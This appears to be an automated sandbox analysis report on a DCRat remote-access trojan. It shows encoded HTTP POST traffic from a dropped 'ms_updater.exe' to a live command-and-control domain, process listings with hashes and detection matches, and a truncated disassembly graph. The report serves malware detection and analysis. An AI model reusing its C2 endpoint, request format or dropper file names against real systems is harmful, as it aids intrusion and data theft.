                                                    Data Ascii: NZxg][|ad_bbljog}wxBha_bl]]olRcsmTy_qG}f_z\yvxBagx[L~JxYaZ`a~XuKQTRj\`okX]ZI{l]K{zkm|wwl~abzSYQ`q[QqBjwOSoR|cHWtaNQz{@\YYhbhYiYUk`[OmMR}\dcZbTnaX^bf]X|f|}HvQp\B{[TYPqJRe]HQ[Ibn~cmvx_\X{~ZKu_ExLuYwr]ldCT{o[W
                                                    Jul 3, 2024 15:52:07.447504044 CEST324OUTPOST /protecttrackDatalifePrivateCentral.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 118621cm.n9shteam2.top
                                                    Content-Length: 384
                                                    Expect: 100-continue
                                                    Jul 3, 2024 15:52:07.552268028 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 15:52:07.552495003 CEST384OUTData Raw: 5e 57 5d 5d 5d 58 50 54 5c 5f 55 57 57 54 50 59 57 55 5f 43 59 59 50 45 58 5e 5c 58 52 5e 55 57 5a 45 53 58 56 5d 56 57 5d 55 52 5e 5f 5a 55 53 50 53 59 5f 58 5a 50 5a 56 5f 53 59 59 59 5f 5a 5b 5c 58 5a 55 58 59 5d 58 5d 5c 5b 59 52 58 57 50 5c
                                                    Data Ascii: ^W]]]XPT\_UWWTPYWU_CYYPEX^\XR^UWZESXV]VW]UR^_ZUSPSY_XZPZV_SYYY_Z[\XZUXY]X]\[YRXWP\PRRXZXVURVYTWPYVZ_]X^T_Z]]^YF_X]UT\YV\XS][_YD^ZRVRW^XZG^XTVZ\WP\_]Q^_[[__Q_][V[QX__Y\WWGZQ_[T\]WY\^YZ\.Z3V/%#V$'=%4 8[<4:[&:;S<1<R%-$" W88"Y.$[,
                                                    Jul 3, 2024 15:52:07.848247051 CEST752INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 13:52:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYDYNTNHEhaufcPii7YtEmonyPiwkNTlPtYb%2F1xPTPP%2F0iRDclphq2%2BB9MkXLDPw8fjfG1rJQJiLUecG1BwKm7htJvVKElfw%2Fso6muHz9toWbm9Fa39%2FT5M5ZGZCYpInveeTE843SCMN"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d75aaedce515d7-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 39 38 0d 0a 0d 1f 22 59 20 05 0b 0f 21 02 37 54 2a 5e 39 00 2a 3b 39 41 27 2c 35 1b 32 3f 08 5c 3b 2f 23 19 26 27 20 5e 2b 12 08 0f 32 30 06 55 27 38 2a 51 03 1b 20 03 32 05 3a 11 28 00 02 5f 25 28 3a 01 31 3e 23 5b 2b 3a 23 10 20 06 3e 5c 30 0a 34 0b 2b 5f 32 51 2f 07 28 1a 2e 22 2a 0a 35 24 2d 54 0f 1f 20 5d 32 3c 24 56 22 0e 26 58 31 58 26 01 34 03 37 51 22 17 02 13 25 2f 3b 10 26 38 28 07 30 54 2c 5f 29 21 23 1f 28 05 28 0b 3c 3b 26 50 2f 01 23 52 01 34 5c 57 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98"Y !7T*^9*;9A',52?\;/#&' ^+20U'8*Q 2:(_%(:1>#[+:# >\04+_2Q/(."*5$-T ]2<$V"&X1X&47Q"%/;&8(0T,_)!#((<;&P/#R4\W0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449731104.21.90.190806768C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 15:52:08.243691921 CEST325OUTPOST /protecttrackDatalifePrivateCentral.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 118621cm.n9shteam2.top
                                                    Content-Length: 1536
                                                    Expect: 100-continue
                                                    Jul 3, 2024 15:52:08.592216015 CEST1536OUTData Raw: 5b 52 58 5f 58 5b 50 55 5c 5f 55 57 57 5b 50 5a 57 5c 5f 44 59 5b 50 47 58 5e 5c 58 52 5e 55 57 5a 45 53 58 56 5d 56 57 5d 55 52 5e 5f 5a 55 53 50 53 59 5f 58 5a 50 5a 56 5f 53 59 59 59 5f 5a 5b 5c 58 5a 55 58 59 5d 58 5d 5c 5b 59 52 58 57 50 5c
                                                    Data Ascii: [RX_X[PU\_UWW[PZW\_DY[PGX^\XR^UWZESXV]VW]UR^_ZUSPSY_XZPZV_SYYY_Z[\XZUXY]X]\[YRXWP\PRRXZXVURVYTWPYVZ_]X^T_Z]]^YF_X]UT\YV\XS][_YD^ZRVRW^XZG^XTVZ\WP\_]Q^_[[__Q_][V[QX__Y\WWGZQ_[T\]WY\^YZ\-$ ']&]7T%'B=%$")8_<$12*+2 W2X<#70;8"Y.$[,
                                                    Jul 3, 2024 15:52:08.710963011 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 15:52:09.081466913 CEST756INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 13:52:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Al%2FYMVMYrMnM4AmmWOz6X6dCTvGRC17qRuwrxgNchYRSRx71E9McycuMMLZR8HDo9gUzEU%2FVVD1z%2B%2BmyVDcrHaUCAum28UyTW%2F%2Fu%2BuveEUEzeUlDD0gN3qXRU4w9mRi2pV5qSDKryZF"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d75ab62e0b6a5e-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 39 38 0d 0a 0d 1f 22 5d 37 02 35 0e 22 2b 2c 0b 2a 2b 35 01 29 16 0f 0a 27 11 36 0b 24 3c 3e 59 2c 3c 2b 51 30 1a 23 06 2b 12 07 1a 31 20 06 56 27 38 2a 51 03 1b 23 18 31 3b 3a 1e 2a 3e 37 02 30 28 21 5d 31 5b 38 07 2b 39 27 59 20 2b 29 07 33 33 2b 57 28 5f 32 1f 2f 07 01 01 3a 32 2d 1f 35 34 2d 54 0f 1f 23 05 24 2f 0e 1c 35 0e 3a 5b 26 3e 39 13 34 2a 30 0f 20 39 34 59 26 3f 23 5e 27 28 23 59 33 22 2c 59 2b 32 24 04 2b 2c 27 52 3f 01 26 50 2f 01 23 52 01 34 5c 57 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98"]75"+,*+5)'6$<>Y,<+Q0#+1 V'8*Q#1;:*>70(!]1[8+9'Y +)33+W(_2/:2-54-T#$/5:[&>94*0 94Y&?#^'(#Y3",Y+2$+,'R?&P/#R4\W0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.449732104.21.90.190806768C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 15:52:08.245197058 CEST349OUTPOST /protecttrackDatalifePrivateCentral.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 118621cm.n9shteam2.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 15:52:08.592111111 CEST1056OUTData Raw: 5b 55 5d 5f 58 5a 50 5c 5c 5f 55 57 57 5e 50 51 57 5a 5f 48 59 52 50 48 58 5e 5c 58 52 5e 55 57 5a 45 53 58 56 5d 56 57 5d 55 52 5e 5f 5a 55 53 50 53 59 5f 58 5a 50 5a 56 5f 53 59 59 59 5f 5a 5b 5c 58 5a 55 58 59 5d 58 5d 5c 5b 59 52 58 57 50 5c
                                                    Data Ascii: [U]_XZP\\_UWW^PQWZ_HYRPHX^\XR^UWZESXV]VW]UR^_ZUSPSY_XZPZV_SYYY_Z[\XZUXY]X]\[YRXWP\PRRXZXVURVYTWPYVZ_]X^T_Z]]^YF_X]UT\YV\XS][_YD^ZRVRW^XZG^XTVZ\WP\_]Q^_[[__Q_][V[QX__Y\WWGZQ_[T\]WY\^YZ\.]%0#2;'$$$C+5?^"*<)$=&:8+2'$=/5<,8"Y.$[,
                                                    Jul 3, 2024 15:52:08.691548109 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 15:52:09.044270039 CEST595INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 13:52:09 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ge%2BWcAS4H6gUWumqy0O6H50dJHFXONdZBawvZmio0NhQw4ZSB6pvf3f4JCWW6drZV7Rs66P50HSG8Yl7wrOuzz6CMshL9ItubWn2nBmBw7pw2SM8OSbXWLvSFJZhi2ZdG1lfcg5MLIJE"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d75ab608881a28-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 34 0d 0a 3f 57 5b 51 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4?W[Q0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.449735104.21.90.190806768C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 15:52:08.983047962 CEST327OUTPOST /protecttrackDatalifePrivateCentral.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 118621cm.n9shteam2.top
                                                    Content-Length: 184204
                                                    Expect: 100-continue


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.449736104.21.90.190806768C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 15:52:09.197371960 CEST325OUTPOST /protecttrackDatalifePrivateCentral.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                    Host: 118621cm.n9shteam2.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:09:52:02
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\Desktop\1hibLFnCm1.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\1hibLFnCm1.exe"
                                                    Imagebase:0xf50000
                                                    File size:906'240 bytes
                                                    MD5 hash:2196EDD4AD9D7E8CA345339A66E2FED5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1701362663.0000000000F8D000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:1
                                                    Start time:09:52:03
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\AppData\Roaming\ms_tool.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\ms_tool.exe"
                                                    Imagebase:0x7ff68c5e0000
                                                    File size:18'944 bytes
                                                    MD5 hash:F3EDFF85DE5FD002692D54A04BCB1C09
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:2
                                                    Start time:09:52:03
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:09:52:03
                                                    Start date:03/07/2024
                                                    Path:C:\Users\user\AppData\Roaming\ms_updater.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\AppData\Roaming\ms_updater.exe"
                                                    Imagebase:0xd90000
                                                    File size:640'512 bytes
                                                    MD5 hash:CEAC3DE237F6B1DC4B279D8E5F5B3689
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000003.00000000.1699967680.0000000000D92000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000003.00000002.1759262008.000000000314B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\ms_updater.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 88%, ReversingLabs
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:5
                                                    Start time:09:52:08
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat"
                                                    Imagebase:0x7ff78c3f0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:09:52:08
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:7
                                                    Start time:09:52:09
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\chcp.com
                                                    Wow64 process (32bit):false
                                                    Commandline:chcp 65001
                                                    Imagebase:0x7ff696430000
                                                    File size:14'848 bytes
                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:8
                                                    Start time:09:52:09
                                                    Start date:03/07/2024
                                                    Path:C:\Windows\System32\w32tm.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                    Imagebase:0x7ff65dea0000
                                                    File size:108'032 bytes
                                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:6%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:4.5%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:86
                                                      execution_graph 22171 f59cf8 22172 f59d13 22171->22172 22174 f59d25 22172->22174 22175 f5918d 22172->22175 22178 f628f0 22175->22178 22179 f628fc __FrameHandler3::FrameUnwindToState 22178->22179 22180 f62903 22179->22180 22181 f6291a 22179->22181 22183 f61f44 __dosmaperr 14 API calls 22180->22183 22191 f5f9e9 EnterCriticalSection 22181->22191 22185 f62908 22183->22185 22184 f62929 22192 f6283a 22184->22192 22187 f61e30 _Ungetc 44 API calls 22185->22187 22189 f5919f 22187->22189 22188 f62937 22204 f62966 22188->22204 22189->22174 22191->22184 22193 f62850 22192->22193 22198 f628b3 _Ungetc 22192->22198 22194 f6bea5 _Ungetc 14 API calls 22193->22194 22195 f6287e 22193->22195 22193->22198 22194->22195 22196 f68c78 _Ungetc 44 API calls 22195->22196 22195->22198 22197 f62890 22196->22197 22197->22198 22199 f68c78 _Ungetc 44 API calls 22197->22199 22198->22188 22200 f6289c 22199->22200 22200->22198 22201 f68c78 _Ungetc 44 API calls 22200->22201 22202 f628a8 22201->22202 22203 f68c78 _Ungetc 44 API calls 22202->22203 22203->22198 22207 f5f9fd LeaveCriticalSection 22204->22207 22206 f6296c 22206->22189 22207->22206 22245 f658d4 22248 f655a0 22245->22248 22249 f655ac __FrameHandler3::FrameUnwindToState 22248->22249 22256 f61f98 EnterCriticalSection 22249->22256 22251 f655b6 22252 f655e4 22251->22252 22254 f71a66 __Getctype 14 API calls 22251->22254 22257 f65602 22252->22257 22254->22251 22256->22251 22260 f61fe0 LeaveCriticalSection 22257->22260 22259 f655f0 22260->22259 22285 f6bcc0 22286 f6bccf 22285->22286 22289 f6bce4 22285->22289 22287 f61f44 __dosmaperr 14 API calls 22286->22287 22288 f6bcd4 22287->22288 22291 f61e30 _Ungetc 44 API calls 22288->22291 22290 f6bcdf 22289->22290 22292 f6bd42 22289->22292 22293 f6bea5 _Ungetc 14 API calls 22289->22293 22291->22290 22294 f68c78 _Ungetc 44 API calls 22292->22294 22293->22292 22295 f6bd72 22294->22295 22305 f75ebb 22295->22305 22298 f68c78 _Ungetc 44 API calls 22299 f6bdb4 22298->22299 22299->22290 22300 f68c78 _Ungetc 44 API calls 22299->22300 22301 f6bdc2 22300->22301 22301->22290 22302 f68c78 _Ungetc 44 API calls 22301->22302 22303 f6bdd0 22302->22303 22304 f68c78 _Ungetc 44 API calls 22303->22304 22304->22290 22306 f75ec7 __FrameHandler3::FrameUnwindToState 22305->22306 22307 f75ee7 22306->22307 22308 f75ecf 22306->22308 22309 f75fa4 22307->22309 22314 f75f1d 22307->22314 22310 f61f31 __dosmaperr 14 API calls 22308->22310 22311 f61f31 __dosmaperr 14 API calls 22309->22311 22312 f75ed4 22310->22312 22315 f75fa9 22311->22315 22313 f61f44 __dosmaperr 14 API calls 22312->22313 22319 f6bd7a 22313->22319 22316 f75f26 22314->22316 22317 f75f3b 22314->22317 22318 f61f44 __dosmaperr 14 API calls 22315->22318 22320 f61f31 __dosmaperr 14 API calls 22316->22320 22335 f70753 EnterCriticalSection 22317->22335 22322 f75f33 22318->22322 22319->22290 22319->22298 22323 f75f2b 22320->22323 22328 f61e30 _Ungetc 44 API calls 22322->22328 22325 f61f44 __dosmaperr 14 API calls 22323->22325 22324 f75f41 22326 f75f72 22324->22326 22327 f75f5d 22324->22327 22325->22322 22329 f75fcf __wsopen_s 56 API calls 22326->22329 22330 f61f44 __dosmaperr 14 API calls 22327->22330 22328->22319 22332 f75f6d 22329->22332 22331 f75f62 22330->22331 22333 f61f31 __dosmaperr 14 API calls 22331->22333 22336 f75f9c 22332->22336 22333->22332 22335->22324 22339 f70808 LeaveCriticalSection 22336->22339 22338 f75fa2 22338->22319 22339->22338 24042 f59ea2 24043 f59ec4 24042->24043 24044 f59ed9 24042->24044 24045 f595ea 70 API calls 24043->24045 24046 f59ec9 24045->24046 24046->24044 24048 f62e85 24046->24048 24049 f62ea5 24048->24049 24050 f62e90 24048->24050 24049->24050 24052 f62eac 24049->24052 24051 f61f44 __dosmaperr 14 API calls 24050->24051 24053 f62e95 24051->24053 24058 f6319b 24052->24058 24055 f61e30 _Ungetc 44 API calls 24053->24055 24057 f62ea0 24055->24057 24057->24044 24059 f631ae _Fputc 24058->24059 24064 f62f3a 24059->24064 24062 f5fa59 _Fputc 44 API calls 24063 f62ebb 24062->24063 24063->24044 24065 f62f46 __FrameHandler3::FrameUnwindToState 24064->24065 24066 f62f4c 24065->24066 24067 f62f80 24065->24067 24068 f61db3 _Fputc 44 API calls 24066->24068 24075 f5f9e9 EnterCriticalSection 24067->24075 24069 f62f67 24068->24069 24069->24062 24071 f62f8c 24076 f630af 24071->24076 24073 f62fa3 24085 f62fcc 24073->24085 24075->24071 24077 f630d5 24076->24077 24078 f630c2 24076->24078 24088 f62fd6 24077->24088 24078->24073 24080 f630f8 24081 f62bab ___scrt_uninitialize_crt 69 API calls 24080->24081 24084 f63186 24080->24084 24082 f63126 24081->24082 24083 f6c893 __wsopen_s 46 API calls 24082->24083 24083->24084 24084->24073 24092 f5f9fd LeaveCriticalSection 24085->24092 24087 f62fd4 24087->24069 24089 f62fe7 24088->24089 24091 f6303f 24088->24091 24090 f6c853 __wsopen_s 46 API calls 24089->24090 24089->24091 24090->24091 24091->24080 24092->24087 22460 f690a8 22461 f690c3 22460->22461 22462 f690b3 22460->22462 22466 f690c9 22462->22466 22465 f681d7 ___free_lconv_mon 14 API calls 22465->22461 22467 f690de 22466->22467 22470 f690e4 22466->22470 22468 f681d7 ___free_lconv_mon 14 API calls 22467->22468 22468->22470 22469 f681d7 ___free_lconv_mon 14 API calls 22471 f690f0 22469->22471 22470->22469 22472 f681d7 ___free_lconv_mon 14 API calls 22471->22472 22473 f690fb 22472->22473 22474 f681d7 ___free_lconv_mon 14 API calls 22473->22474 22475 f69106 22474->22475 22476 f681d7 ___free_lconv_mon 14 API calls 22475->22476 22477 f69111 22476->22477 22478 f681d7 ___free_lconv_mon 14 API calls 22477->22478 22479 f6911c 22478->22479 22480 f681d7 ___free_lconv_mon 14 API calls 22479->22480 22481 f69127 22480->22481 22482 f681d7 ___free_lconv_mon 14 API calls 22481->22482 22483 f69132 22482->22483 22484 f681d7 ___free_lconv_mon 14 API calls 22483->22484 22485 f6913d 22484->22485 22486 f681d7 ___free_lconv_mon 14 API calls 22485->22486 22487 f6914b 22486->22487 22492 f68ef5 22487->22492 22493 f68f01 __FrameHandler3::FrameUnwindToState 22492->22493 22508 f61f98 EnterCriticalSection 22493->22508 22495 f68f35 22509 f68f54 22495->22509 22497 f68f0b 22497->22495 22499 f681d7 ___free_lconv_mon 14 API calls 22497->22499 22499->22495 22500 f68f60 22501 f68f6c __FrameHandler3::FrameUnwindToState 22500->22501 22513 f61f98 EnterCriticalSection 22501->22513 22503 f68f76 22504 f69196 __dosmaperr 14 API calls 22503->22504 22505 f68f89 22504->22505 22514 f68fa9 22505->22514 22508->22497 22512 f61fe0 LeaveCriticalSection 22509->22512 22511 f68f42 22511->22500 22512->22511 22513->22503 22517 f61fe0 LeaveCriticalSection 22514->22517 22516 f68f97 22516->22465 22517->22516 22567 f62c82 22568 f62c94 22567->22568 22570 f62c9d ___scrt_uninitialize_crt 22567->22570 22569 f62b06 ___scrt_uninitialize_crt 71 API calls 22568->22569 22571 f62c9a 22569->22571 22572 f62cae 22570->22572 22575 f62aa6 22570->22575 22576 f62ab2 __FrameHandler3::FrameUnwindToState 22575->22576 22583 f5f9e9 EnterCriticalSection 22576->22583 22578 f62ac0 22579 f62c14 ___scrt_uninitialize_crt 71 API calls 22578->22579 22580 f62ad1 22579->22580 22584 f62afa 22580->22584 22583->22578 22587 f5f9fd LeaveCriticalSection 22584->22587 22586 f62ae3 22587->22586 19256 f5ae64 19257 f5ae70 __FrameHandler3::FrameUnwindToState 19256->19257 19282 f5b289 19257->19282 19259 f5ae77 19260 f5afd0 19259->19260 19270 f5aea1 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 19259->19270 19318 f5b991 IsProcessorFeaturePresent 19260->19318 19262 f5afd7 19297 f6539a 19262->19297 19267 f5aec0 19268 f5af41 19290 f64fd8 19268->19290 19270->19267 19270->19268 19300 f65374 19270->19300 19272 f5af47 19294 f55050 CreateThread WaitForSingleObject 19272->19294 19277 f5af6c 19278 f5af75 19277->19278 19309 f6534f 19277->19309 19312 f5b3fa 19278->19312 19283 f5b292 19282->19283 19325 f5b675 IsProcessorFeaturePresent 19283->19325 19287 f5b2a3 19288 f5b2a7 19287->19288 19335 f5e43d 19287->19335 19288->19259 19291 f64fe1 19290->19291 19292 f64fe6 19290->19292 19395 f64d32 19291->19395 19292->19272 19295 f5aff0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 19294->19295 20115 f54c70 19294->20115 19296 f55092 19295->19296 19307 f5bab1 GetModuleHandleW 19296->19307 21399 f65182 19297->21399 19301 f618b2 __FrameHandler3::FrameUnwindToState 19300->19301 19302 f6538a std::_Lockit::_Lockit 19300->19302 19303 f691e1 _unexpected 44 API calls 19301->19303 19302->19268 19306 f618c3 19303->19306 19304 f5f7b3 __purecall 44 API calls 19305 f618ed 19304->19305 19306->19304 19308 f5af68 19307->19308 19308->19262 19308->19277 19310 f65182 std::locale::_Setgloballocale 23 API calls 19309->19310 19311 f6535a 19310->19311 19311->19278 19313 f5b406 19312->19313 19317 f5af7e 19313->19317 21476 f67157 19313->21476 19315 f5b414 19316 f5e43d ___scrt_uninitialize_crt 7 API calls 19315->19316 19316->19317 19317->19267 19319 f5b9a7 codecvt std::locale::_Setgloballocale 19318->19319 19320 f5ba52 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19319->19320 19321 f5ba9d std::locale::_Setgloballocale 19320->19321 19321->19262 19322 f6535e 19323 f65182 std::locale::_Setgloballocale 23 API calls 19322->19323 19324 f5afe5 19323->19324 19326 f5b29e 19325->19326 19327 f5e41e 19326->19327 19341 f5f4a7 19327->19341 19329 f5e427 19329->19287 19332 f5e42f 19333 f5e43a 19332->19333 19355 f5f4e3 19332->19355 19333->19287 19336 f5e446 19335->19336 19337 f5e450 19335->19337 19338 f5e5b6 ___vcrt_uninitialize_ptd 6 API calls 19336->19338 19337->19288 19339 f5e44b 19338->19339 19340 f5f4e3 ___vcrt_uninitialize_locks DeleteCriticalSection 19339->19340 19340->19337 19342 f5f4b0 19341->19342 19344 f5f4d9 19342->19344 19345 f5e423 19342->19345 19359 f5f6ec 19342->19359 19346 f5f4e3 ___vcrt_uninitialize_locks DeleteCriticalSection 19344->19346 19345->19329 19347 f5e583 19345->19347 19346->19345 19376 f5f5fd 19347->19376 19350 f5e598 19350->19332 19353 f5e5b3 19353->19332 19356 f5f4ee 19355->19356 19358 f5f50d 19355->19358 19357 f5f4f8 DeleteCriticalSection 19356->19357 19357->19357 19357->19358 19358->19329 19364 f5f512 19359->19364 19362 f5f724 InitializeCriticalSectionAndSpinCount 19363 f5f70f 19362->19363 19363->19342 19365 f5f52f 19364->19365 19368 f5f533 19364->19368 19365->19362 19365->19363 19366 f5f59b GetProcAddress 19366->19365 19368->19365 19368->19366 19369 f5f58c 19368->19369 19371 f5f5b2 LoadLibraryExW 19368->19371 19369->19366 19370 f5f594 FreeLibrary 19369->19370 19370->19366 19372 f5f5c9 GetLastError 19371->19372 19373 f5f5f9 19371->19373 19372->19373 19374 f5f5d4 ___vcrt_FlsGetValue 19372->19374 19373->19368 19374->19373 19375 f5f5ea LoadLibraryExW 19374->19375 19375->19368 19377 f5f512 ___vcrt_FlsGetValue 5 API calls 19376->19377 19378 f5f617 19377->19378 19379 f5f630 TlsAlloc 19378->19379 19380 f5e58d 19378->19380 19380->19350 19381 f5f6ae 19380->19381 19382 f5f512 ___vcrt_FlsGetValue 5 API calls 19381->19382 19383 f5f6c8 19382->19383 19384 f5f6e3 TlsSetValue 19383->19384 19385 f5e5a6 19383->19385 19384->19385 19385->19353 19386 f5e5b6 19385->19386 19387 f5e5c0 19386->19387 19389 f5e5c6 19386->19389 19390 f5f638 19387->19390 19389->19350 19391 f5f512 ___vcrt_FlsGetValue 5 API calls 19390->19391 19392 f5f652 19391->19392 19393 